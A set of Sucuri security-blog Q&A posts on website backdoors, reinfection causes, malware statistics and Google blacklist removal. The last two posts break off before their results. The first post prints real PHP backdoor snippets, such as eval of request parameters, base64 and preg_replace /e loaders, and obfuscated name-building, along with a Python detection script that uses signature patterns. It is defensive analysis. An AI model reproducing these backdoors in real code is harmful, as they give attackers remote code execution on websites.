ASK Sucuri: What about the backdoors?


If you have any question about malware, blacklisting, or security in general, send it to us: and we will answer here. For all the “ask sucuri” answers, go here.

Question: What about the backdoors? Why are they so hard to find? How do you guys find them?

When a site gets compromised, one thing we know for sure is that the attackers will leave some piece of malware in there to allow them access back to the site. We call this type of malware, backdoors.

Backdoors are very hard to find because they don’t have to be linked from anywhere in the site, they can be very small, and they are easily confused with “normal” code. Some of them are password-protected, some are heavily encrypted/encoded, and they can be anywhere in your site.

On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that is unlikely to find everything (and your site will just get reinfected).

For example, on the latest osCommerce compromises, all the sites had the following code added to the application_top.php file:

if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.

What about this one:


What do you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean about them being hard to detect and search for?

Fun Quiz: Find the backdoor?

Since backdoors can be in any type or shape, let’s look at some examples:

The “Filesman” backdoor, big, complex and easy to find:

$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = "SQL";
$default_charset = "Windows-1251";
$protectionoffer = "ficken";
preg_replace("/.*/e","\x65\x76\x61\x6C.. hundreds more lines..

Another simple backdoor, executing any code sent in the “php” POST parameter:

eval (base64_decode($_POST["php"]));

A WordPress-based backdoor. This time, the bad content is hidden inside the database (the wp_options table):

return @eval(get_option('blogopt1'));

A messy backdoor we are seeing in the latest timthumb.php attacks. In this case, all the variable names are completely random, different per site and per file:

function aknhtkmml3($ur5){$dtuq='$u';$pnt='e6';$p5zy='r';$xcl4='e(';$feuh='od';$qjka='dec';$rhi='$u';
return $ur5;}$sk25='M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…

Another messy one. Do you know how the code is executed there? preg_replace with the “e” modifier actually acts like an “eval”:

$llllllll='ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack('H*', '406576616c286261736536345f6465636f646528').'$llllllll))';
preg_replace($llllll, $lllllllll, $lllllll);

Searching for base64_decode? Well, what happens when the attackers do this:

<?php $XKsyG='as';$RqoaUO='e';$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';$joEDdb

And those are just some simple examples…


So, how to find backdoors?

Finding them is very hard, but at Sucuri we were able to come up with some techniques that work very well:

  1. White listing. We know what the good files look like. We have a large checksum set of all the core WordPress, Joomla, osCommerce, Wiki, etc. files. We also have the checksums for the most popular plugins, modules, extensions and themes. Do you know what that gives us? We know right away if any of the core files were modified (or a new one was added), and we can safely ignore the good ones.
  2. Black listing. We also have a list with thousands of backdoors (and their variations) that we have been finding over the last few years.
  3. Anomaly checks. When a file is not in our white list (core files) and not in our blacklist, we run our anomaly checks, where all the functions/variables are analysed and manually inspected to see if they form a backdoor. If they do, we update our blacklists to catch them in the future; if not, another file goes into our white list…

So we mix white listing + blacklisting and our own manual analysis to find all the backdoors in a site. If you are trying to clean a compromised site by yourself, we recommend first overwriting all the files you can (core files, plugins, etc.). Whatever is left, you have to analyse manually to make sure it is clean…
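To make the three-step process concrete, and to show how the backdoor shapes from the examples above would be caught, here is an added Python example that is not Sucuri's own tooling: it whitelists files by checksum, runs a small signature blacklist modelled on the snippets in this post, and falls back to anomaly heuristics for whatever is left. The checksum set, the sample files and the signature names are constructed for illustration.

```python
import hashlib
import re

# Signature blacklist built from the backdoor shapes shown in the post.
BLACKLIST = [
    ("eval of request data", re.compile(r"eval\s*\(\s*(?:stripslashes\s*\()?\s*\$_(?:REQUEST|POST|GET)", re.I)),
    ("eval of base64", re.compile(r"eval\s*\(\s*@?base64_decode\s*\(", re.I)),
    ("eval of database option", re.compile(r"eval\s*\(\s*get_option\s*\(", re.I)),
    ("preg_replace /e modifier", re.compile(r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I)),
    ("hex-packed code", re.compile(r"pack\s*\(\s*['\"]H\*['\"]", re.I)),
]
# Anomaly heuristics for files that are neither whitelisted nor blacklisted.
FRAGMENT_CONCAT = re.compile(r"['\"][A-Za-z_]{1,3}['\"]\s*\.\s*(?:\$\w+|['\"][A-Za-z_]{1,3}['\"])")
VARIABLE_CALL = re.compile(r"\$\w+\s*\(")  # $name(...) call through a variable

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def anomaly_reasons(content: str) -> list:
    reasons = []
    if len(FRAGMENT_CONCAT.findall(content)) >= 2:
        reasons.append("function name assembled from string fragments")
    if VARIABLE_CALL.search(content):
        reasons.append("dynamic call through a variable")
    if any(len(line) > 500 for line in content.splitlines()):
        reasons.append("very long line")  # encoded payloads usually sit on one huge line
    return reasons

def classify(path: str, data: bytes, known_good: dict) -> tuple:
    # Whitelist by checksum first, then blacklist by signature, then anomaly heuristics.
    if known_good.get(path) == sha256_hex(data):
        return "clean", []
    content = data.decode("utf-8", errors="replace")
    hits = [name for name, rx in BLACKLIST if rx.search(content)]
    if hits:
        return "blacklisted", hits
    reasons = anomaly_reasons(content)
    return ("anomalous", reasons) if reasons else ("review", ["not whitelisted; inspect manually"])

def scan(files: dict, known_good: dict) -> dict:
    return {path: classify(path, data, known_good) for path, data in files.items()}

# Constructed sample site: a known-good file, a request eval, an obfuscated loader, a harmless custom file.
SAMPLES = {
    "index.php": b"<?php echo 'hello'; ?>\n",
    "includes/application_top.php": b"<?php\nif (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));\n",
    "wp-content/plugins/helper.php": b"<?php $XKsyG='as';$RqoaUO='e';$ygDOEJ=$XKsyG.'s'.$RqoaUO.'r'.'t';$ygDOEJ(base64_decode('ZWNobyAxOw=='));\n",
    "custom/math.php": b"<?php function add($a, $b) { return $a + $b; }\n",
}
KNOWN_GOOD = {"index.php": sha256_hex(SAMPLES["index.php"])}  # constructed checksum set
```

Calling scan(SAMPLES, KNOWN_GOOD) returns a verdict per path: the osCommerce-style eval is caught by the blacklist, the string-assembled call is flagged by the anomaly checks even though it never mentions eval or base64_decode, and the unknown custom file is left for manual review.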

What do you think? I would love to hear other ideas to identify backdoors that you guys are using.

Need someone to secure and clean a hacked site? Sign up with us here: http://sucuri.net/signup.

ASK Sucuri: Why does my site keep getting reinfected?


Question: Why does my site keep getting hacked / reinfected?

A lot of our new customers only get in contact with us after trying many times to clean up their sites manually without success. A common first question is “I cleaned my site 3 times already and it keeps getting reinfected and blacklisted. What can I do? Can you guys clean it up for good?”

Based on our experience, these are the 4 main causes of reinfections on web sites:

  1. A backdoor is still present in your site. Even though you removed the visible malware, you might still have hidden backdoors in there that the attackers are using to compromise your site. Sometimes even a “clean” backup might still have a backdoor in it. During our cleanups, we always search for and remove the hidden backdoors (even when they don’t show up in our scanner).
  2. Stolen FTP/SSH/Admin passwords. This is very common, especially via FTP and compromised desktops. Are you changing your passwords? Is your desktop secure? Even if your desktop is secure, are you using FTP on an insecure wireless (or wired) network? The recommendation is to change all your passwords and scan your desktop for viruses.
  3. Vulnerability in your site. Are you using an outdated CMS? Maybe your WordPress or Joomla or forum is not updated? Make sure to update them as soon as possible to avoid reinfections.
  4. Same account infections. If you have other sites in the same FTP account and they are compromised (or infected), the malware can spread back to the site you just fixed. Do you have more sites in the same FTP account? This is especially common on shared servers, but it also happens on dedicated servers.

There are also other reasons for reinfections, like when your web hosting company is compromised, causing those “mass infections” we blog about sometimes. But that is outside your power, and there is not much you can do about it, except switching hosts.

Have a question or a comment? Make sure to ask below :)

Ask Sucuri: What is the most common type of malware out there?


Question: What is the most common type of malware (on web sites) that you find?

Unfortunately the answer to this question changes every few months. For the months of February and March (2011), we scanned more than 200,000 web sites (211,520 to be more precise) and almost half of those sites had some type of malware (a high percentage of the people scanning sites with our scanners already have an infected site or suspect some type of funny business with their web property).

To be exact, 90,870 (around 42%) had some type of malware. This is the breakdown (some sites had more than one issue identified, so the numbers may not add up):


Ask Sucuri: How long does it take for a site to be removed from Google’s blacklist?


Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean, however, it is still blacklisted by Google. How long until they remove us?

This is a very common question. In fact, every time we clean a hacked site, its owner asks us the same question: how long until that scary red warning sign is gone?

To give a solid answer to our clients, over the last few months we have been timing how long it takes from the moment a review is requested until Google removes the site from the blacklist. We have now timed more than 500 blacklist removals, so I think we have some good numbers to back us up.

Here are the results: